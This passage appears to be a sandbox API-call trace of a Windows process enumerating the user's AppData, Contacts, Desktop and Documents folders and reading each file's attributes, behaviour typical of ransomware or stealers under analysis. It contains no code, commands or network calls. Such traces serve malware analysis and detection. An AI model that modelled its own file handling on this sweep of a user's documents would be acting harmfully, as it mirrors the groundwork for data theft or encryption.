nFileSizeHigh=0x0, nFileSizeLow=0x45d)) returned 1 [0039.428] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\obZ3fvDOvaGgm.bmp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\obz3fvdovaggm.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x63fab970, ftCreationTime.dwHighDateTime=0x1d41cf8, ftLastAccessTime.dwLowDateTime=0x99f426b0, ftLastAccessTime.dwHighDateTime=0x1d410a5, ftLastWriteTime.dwLowDateTime=0x99f426b0, ftLastWriteTime.dwHighDateTime=0x1d410a5, nFileSizeHigh=0x0, nFileSizeLow=0xb536)) returned 1 [0039.429] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\Ru9h2qEjn2zXAzNP.jpg" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\ru9h2qejn2zxaznp.jpg"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7d587cc0, ftCreationTime.dwHighDateTime=0x1d4186d, ftLastAccessTime.dwLowDateTime=0x964f90d0, ftLastAccessTime.dwHighDateTime=0x1d41fdc, ftLastWriteTime.dwLowDateTime=0x964f90d0, ftLastWriteTime.dwHighDateTime=0x1d41fdc, nFileSizeHigh=0x0, nFileSizeLow=0x10aae)) returned 1 [0039.429] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\uihiW9lJeoF869.swf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\uihiw9ljeof869.swf"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x880fba90, ftCreationTime.dwHighDateTime=0x1d415f5, ftLastAccessTime.dwLowDateTime=0x772cd690, ftLastAccessTime.dwHighDateTime=0x1d41dcf, ftLastWriteTime.dwLowDateTime=0x772cd690, ftLastWriteTime.dwHighDateTime=0x1d41dcf, nFileSizeHigh=0x0, nFileSizeLow=0x46fb)) returned 1 [0039.429] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\uVSh.pps" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\uvsh.pps"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf3031c40, ftCreationTime.dwHighDateTime=0x1d41873, ftLastAccessTime.dwLowDateTime=0x9e908be0, ftLastAccessTime.dwHighDateTime=0x1d4172c, ftLastWriteTime.dwLowDateTime=0x9e908be0, ftLastWriteTime.dwHighDateTime=0x1d4172c, nFileSizeHigh=0x0, nFileSizeLow=0x647c)) returned 1 [0039.430] FindClose (in: hFindFile=0x37e3a0 | out: hFindFile=0x37e3a0) returned 1 [0039.430] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.430] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\application data\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0039.430] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\contacts\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.430] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\contacts\\Administrator.contact" (normalized: "c:\\users\\eebsym5\\contacts\\administrator.contact"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0x1ff8a75a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e)) returned 1 [0039.430] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\contacts\\desktop.ini" (normalized: "c:\\users\\eebsym5\\contacts\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec3e8400, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x19c)) returned 1 [0039.431] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a55460, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0x56a55460, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0x56a55460, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x4eb)) returned 1 [0039.431] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact" (normalized: "c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7abb8cc0, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0x7abb8cc0, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0x7abb8cc0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x4e8)) returned 1 [0039.432] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact" (normalized: "c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c4ad560, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0x6c4ad560, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0x6c4ad560, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x4e9)) returned 1 [0039.433] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25458f20, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0x25458f20, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0x25458f20, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x4f1)) returned 1 [0039.433] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3beee70, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xe3beee70, ftLastAccessTime.dwHighDateTime=0x1d2fb2e, ftLastWriteTime.dwLowDateTime=0xe3beee70, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x4f3)) returned 1 [0039.434] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.434] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\cookies\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0039.434] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\desktop\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.434] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\3V7EOA.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\3v7eoa.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ac0df30, ftCreationTime.dwHighDateTime=0x1d41494, ftLastAccessTime.dwLowDateTime=0x357e2270, ftLastAccessTime.dwHighDateTime=0x1d4117d, ftLastWriteTime.dwLowDateTime=0x357e2270, ftLastWriteTime.dwHighDateTime=0x1d4117d, nFileSizeHigh=0x0, nFileSizeLow=0x12fa4)) returned 1 [0039.435] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\5uaSKEr4bBUrOcV.odt" (normalized: "c:\\users\\eebsym5\\desktop\\5uasker4bburocv.odt"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42309e50, ftCreationTime.dwHighDateTime=0x1d41bda, ftLastAccessTime.dwLowDateTime=0xb8d131c0, ftLastAccessTime.dwHighDateTime=0x1d4175a, ftLastWriteTime.dwLowDateTime=0xb8d131c0, ftLastWriteTime.dwHighDateTime=0x1d4175a, nFileSizeHigh=0x0, nFileSizeLow=0x1154f)) returned 1 [0039.435] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\6HjH3n9FWlBwapw.swf" (normalized: "c:\\users\\eebsym5\\desktop\\6hjh3n9fwlbwapw.swf"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42367620, ftCreationTime.dwHighDateTime=0x1d41ae7, ftLastAccessTime.dwLowDateTime=0x8bfa78d0, ftLastAccessTime.dwHighDateTime=0x1d41a54, ftLastWriteTime.dwLowDateTime=0x8bfa78d0, ftLastWriteTime.dwHighDateTime=0x1d41a54, nFileSizeHigh=0x0, nFileSizeLow=0x5672)) returned 1 [0039.435] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\8HiAFVOlg-DGPUklk6n.png" (normalized: "c:\\users\\eebsym5\\desktop\\8hiafvolg-dgpuklk6n.png"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6f5cd00, ftCreationTime.dwHighDateTime=0x1d4124e, ftLastAccessTime.dwLowDateTime=0xc13a7a90, ftLastAccessTime.dwHighDateTime=0x1d41eeb, ftLastWriteTime.dwLowDateTime=0xc13a7a90, ftLastWriteTime.dwHighDateTime=0x1d41eeb, nFileSizeHigh=0x0, nFileSizeLow=0x7bf9)) returned 1 [0039.435] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37e3a0 [0039.435] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\2zf9Tk.png" (normalized: "c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\2zf9tk.png"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x637cc810, ftCreationTime.dwHighDateTime=0x1d4166f, ftLastAccessTime.dwLowDateTime=0xc5b53e10, ftLastAccessTime.dwHighDateTime=0x1d41e0b, ftLastWriteTime.dwLowDateTime=0xc5b53e10, ftLastWriteTime.dwHighDateTime=0x1d41e0b, nFileSizeHigh=0x0, nFileSizeLow=0x3156)) returned 1 [0039.436] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\dJ9gQhS1qT3LJpBx2k_l.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\dj9gqhs1qt3ljpbx2k_l.mp4"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0d01f0, ftCreationTime.dwHighDateTime=0x1d41590, ftLastAccessTime.dwLowDateTime=0x5b829fe0, ftLastAccessTime.dwHighDateTime=0x1d41df4, ftLastWriteTime.dwLowDateTime=0x5b829fe0, ftLastWriteTime.dwHighDateTime=0x1d41df4, nFileSizeHigh=0x0, nFileSizeLow=0xe3f7)) returned 1 [0039.436] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\OV2KETm vRcSS.ods" (normalized: "c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\ov2ketm vrcss.ods"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdd6b200, ftCreationTime.dwHighDateTime=0x1d41973, ftLastAccessTime.dwLowDateTime=0x2cd18090, ftLastAccessTime.dwHighDateTime=0x1d41cdb, ftLastWriteTime.dwLowDateTime=0x2cd18090, ftLastWriteTime.dwHighDateTime=0x1d41cdb, nFileSizeHigh=0x0, nFileSizeLow=0x9098)) returned 1 [0039.436] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\tMsz9fchZoyeFz.swf" (normalized: "c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\tmsz9fchzoyefz.swf"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7333480, ftCreationTime.dwHighDateTime=0x1d4167c, ftLastAccessTime.dwLowDateTime=0x9694f0, ftLastAccessTime.dwHighDateTime=0x1d41e81, ftLastWriteTime.dwLowDateTime=0x9694f0, ftLastWriteTime.dwHighDateTime=0x1d41e81, nFileSizeHigh=0x0, nFileSizeLow=0xaeb1)) returned 1 [0039.436] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\Z8mOx85_eP.xls" (normalized: "c:\\users\\eebsym5\\desktop\\axulfpegctdabhejzk\\z8mox85_ep.xls"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea7ed340, ftCreationTime.dwHighDateTime=0x1d41e89, ftLastAccessTime.dwLowDateTime=0x2fcf70c0, ftLastAccessTime.dwHighDateTime=0x1d41337, ftLastWriteTime.dwLowDateTime=0x2fcf70c0, ftLastWriteTime.dwHighDateTime=0x1d41337, nFileSizeHigh=0x0, nFileSizeLow=0x26a6)) returned 1 [0039.436] FindClose (in: hFindFile=0x37e3a0 | out: hFindFile=0x37e3a0) returned 1 [0039.437] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec3e8400, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x11a)) returned 1 [0039.437] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\eieHCNgft4loKCrVtA.ods" (normalized: "c:\\users\\eebsym5\\desktop\\eiehcngft4lokcrvta.ods"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb15c1200, ftCreationTime.dwHighDateTime=0x1d413b0, ftLastAccessTime.dwLowDateTime=0x57d12f60, ftLastAccessTime.dwHighDateTime=0x1d40ff8, ftLastWriteTime.dwLowDateTime=0x57d12f60, ftLastWriteTime.dwHighDateTime=0x1d40ff8, nFileSizeHigh=0x0, nFileSizeLow=0x159c3)) returned 1 [0039.437] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\igRWm8V5jW5uAeAOnz.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\igrwm8v5jw5uaeaonz.jpg"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4055cfe0, ftCreationTime.dwHighDateTime=0x1d41a92, ftLastAccessTime.dwLowDateTime=0xa04b0d60, ftLastAccessTime.dwHighDateTime=0x1d411ab, ftLastWriteTime.dwLowDateTime=0xa04b0d60, ftLastWriteTime.dwHighDateTime=0x1d411ab, nFileSizeHigh=0x0, nFileSizeLow=0xde64)) returned 1 [0039.438] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\IO7i n.ots" (normalized: "c:\\users\\eebsym5\\desktop\\io7i n.ots"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b06f3f0, ftCreationTime.dwHighDateTime=0x1d410e6, ftLastAccessTime.dwLowDateTime=0x39e7340, ftLastAccessTime.dwHighDateTime=0x1d41dbc, ftLastWriteTime.dwLowDateTime=0x39e7340, ftLastWriteTime.dwHighDateTime=0x1d41dbc, nFileSizeHigh=0x0, nFileSizeLow=0x17777)) returned 1 [0039.438] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\NZqZPYC.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\nzqzpyc.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd54f7d70, ftCreationTime.dwHighDateTime=0x1d415d9, ftLastAccessTime.dwLowDateTime=0x93024170, ftLastAccessTime.dwHighDateTime=0x1d414e2, ftLastWriteTime.dwLowDateTime=0x93024170, ftLastWriteTime.dwHighDateTime=0x1d414e2, nFileSizeHigh=0x0, nFileSizeLow=0x3a39)) returned 1 [0039.438] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\desktop\\px3idt\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37e3a0 [0039.438] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\px3idt\\5nu8-FDf95Oj.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\px3idt\\5nu8-fdf95oj.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77cdfc90, ftCreationTime.dwHighDateTime=0x1d41650, ftLastAccessTime.dwLowDateTime=0x42d62590, ftLastAccessTime.dwHighDateTime=0x1d411f4, ftLastWriteTime.dwLowDateTime=0x42d62590, ftLastWriteTime.dwHighDateTime=0x1d411f4, nFileSizeHigh=0x0, nFileSizeLow=0xfb41)) returned 1 [0039.439] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\px3idt\\kjUgeo.swf" (normalized: "c:\\users\\eebsym5\\desktop\\px3idt\\kjugeo.swf"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d417180, ftCreationTime.dwHighDateTime=0x1d413bb, ftLastAccessTime.dwLowDateTime=0x2248be10, ftLastAccessTime.dwHighDateTime=0x1d410b3, ftLastWriteTime.dwLowDateTime=0x2248be10, ftLastWriteTime.dwHighDateTime=0x1d410b3, nFileSizeHigh=0x0, nFileSizeLow=0x18544)) returned 1 [0039.439] FindClose (in: hFindFile=0x37e3a0 | out: hFindFile=0x37e3a0) returned 1 [0039.439] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\sbVtvoiRvzko.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\sbvtvoirvzko.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x481051b0, ftCreationTime.dwHighDateTime=0x1d41718, ftLastAccessTime.dwLowDateTime=0xe8202930, ftLastAccessTime.dwHighDateTime=0x1d41b5c, ftLastWriteTime.dwLowDateTime=0xe8202930, ftLastWriteTime.dwHighDateTime=0x1d41b5c, nFileSizeHigh=0x0, nFileSizeLow=0x7800)) returned 1 [0039.440] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\sP5Wi4z896PmAG.pptx" (normalized: "c:\\users\\eebsym5\\desktop\\sp5wi4z896pmag.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd513e860, ftCreationTime.dwHighDateTime=0x1d41065, ftLastAccessTime.dwLowDateTime=0x429ccba0, ftLastAccessTime.dwHighDateTime=0x1d4197f, ftLastWriteTime.dwLowDateTime=0x429ccba0, ftLastWriteTime.dwHighDateTime=0x1d4197f, nFileSizeHigh=0x0, nFileSizeLow=0x9984)) returned 1 [0039.440] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\desktop\\trmwcmpckt6m5vjebei\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37e3a0 [0039.440] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\trmwcmpckt6m5vjebei\\QWxH6AY0aE-AZi.ods" (normalized: "c:\\users\\eebsym5\\desktop\\trmwcmpckt6m5vjebei\\qwxh6ay0ae-azi.ods"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a1fdfa0, ftCreationTime.dwHighDateTime=0x1d417ad, ftLastAccessTime.dwLowDateTime=0xd5f31d10, ftLastAccessTime.dwHighDateTime=0x1d41500, ftLastWriteTime.dwLowDateTime=0xd5f31d10, ftLastWriteTime.dwHighDateTime=0x1d41500, nFileSizeHigh=0x0, nFileSizeLow=0xa079)) returned 1 [0039.440] FindClose (in: hFindFile=0x37e3a0 | out: hFindFile=0x37e3a0) returned 1 [0039.441] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\UIaYYkumn.png" (normalized: "c:\\users\\eebsym5\\desktop\\uiayykumn.png"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b719d30, ftCreationTime.dwHighDateTime=0x1d42022, ftLastAccessTime.dwLowDateTime=0x1ac76330, ftLastAccessTime.dwHighDateTime=0x1d41b08, ftLastWriteTime.dwLowDateTime=0x1ac76330, ftLastWriteTime.dwHighDateTime=0x1d41b08, nFileSizeHigh=0x0, nFileSizeLow=0x1352b)) returned 1 [0039.441] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\VLAxuSYDTePEe x-1tp.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\vlaxusydtepee x-1tp.mp4"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x618715a0, ftCreationTime.dwHighDateTime=0x1d41319, ftLastAccessTime.dwLowDateTime=0x387386d0, ftLastAccessTime.dwHighDateTime=0x1d417e2, ftLastWriteTime.dwLowDateTime=0x387386d0, ftLastWriteTime.dwHighDateTime=0x1d417e2, nFileSizeHigh=0x0, nFileSizeLow=0x18ff9)) returned 1 [0039.441] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\wK28d7RA9P.pptx" (normalized: "c:\\users\\eebsym5\\desktop\\wk28d7ra9p.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa046c20, ftCreationTime.dwHighDateTime=0x1d412c8, ftLastAccessTime.dwLowDateTime=0xf7a94ab0, ftLastAccessTime.dwHighDateTime=0x1d41460, ftLastWriteTime.dwLowDateTime=0xf7a94ab0, ftLastWriteTime.dwHighDateTime=0x1d41460, nFileSizeHigh=0x0, nFileSizeLow=0x16c3a)) returned 1 [0039.441] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\XSotipysXjYhxFGSuq.swf" (normalized: "c:\\users\\eebsym5\\desktop\\xsotipysxjyhxfgsuq.swf"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaec9d80, ftCreationTime.dwHighDateTime=0x1d416f3, ftLastAccessTime.dwLowDateTime=0xde0c9050, ftLastAccessTime.dwHighDateTime=0x1d41b61, ftLastWriteTime.dwLowDateTime=0xde0c9050, ftLastWriteTime.dwHighDateTime=0x1d41b61, nFileSizeHigh=0x0, nFileSizeLow=0x9358)) returned 1 [0039.441] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\XXPGWpk8dID vR4aFz.doc" (normalized: "c:\\users\\eebsym5\\desktop\\xxpgwpk8did vr4afz.doc"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1223da0, ftCreationTime.dwHighDateTime=0x1d41979, ftLastAccessTime.dwLowDateTime=0x34bb0e00, ftLastAccessTime.dwHighDateTime=0x1d416b6, ftLastWriteTime.dwLowDateTime=0x34bb0e00, ftLastWriteTime.dwHighDateTime=0x1d416b6, nFileSizeHigh=0x0, nFileSizeLow=0xbedf)) returned 1 [0039.442] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\Y-1QcNmR1SG.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\y-1qcnmr1sg.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c1b3140, ftCreationTime.dwHighDateTime=0x1d41d42, ftLastAccessTime.dwLowDateTime=0xe1f1c420, ftLastAccessTime.dwHighDateTime=0x1d41179, ftLastWriteTime.dwLowDateTime=0xe1f1c420, ftLastWriteTime.dwHighDateTime=0x1d41179, nFileSizeHigh=0x0, nFileSizeLow=0x518c)) returned 1 [0039.442] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.442] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\documents\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.442] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\3cekd.docx" (normalized: "c:\\users\\eebsym5\\documents\\3cekd.docx"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37668060, ftCreationTime.dwHighDateTime=0x1d3ea3f, ftLastAccessTime.dwLowDateTime=0x29d89d20, ftLastAccessTime.dwHighDateTime=0x1d3b9d9, ftLastWriteTime.dwLowDateTime=0x29d89d20, ftLastWriteTime.dwHighDateTime=0x1d3b9d9, nFileSizeHigh=0x0, nFileSizeLow=0x1c38)) returned 1 [0039.442] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\3H1cW86PebjnUv1Yb-m.csv" (normalized: "c:\\users\\eebsym5\\documents\\3h1cw86pebjnuv1yb-m.csv"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1b02490, ftCreationTime.dwHighDateTime=0x1d41c6c, ftLastAccessTime.dwLowDateTime=0x8fc36ea0, ftLastAccessTime.dwHighDateTime=0x1d41d3c, ftLastWriteTime.dwLowDateTime=0x8fc36ea0, ftLastWriteTime.dwHighDateTime=0x1d41d3c, nFileSizeHigh=0x0, nFileSizeLow=0x18e5a)) returned 1 [0039.443] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\3Iwyi.xlsx" 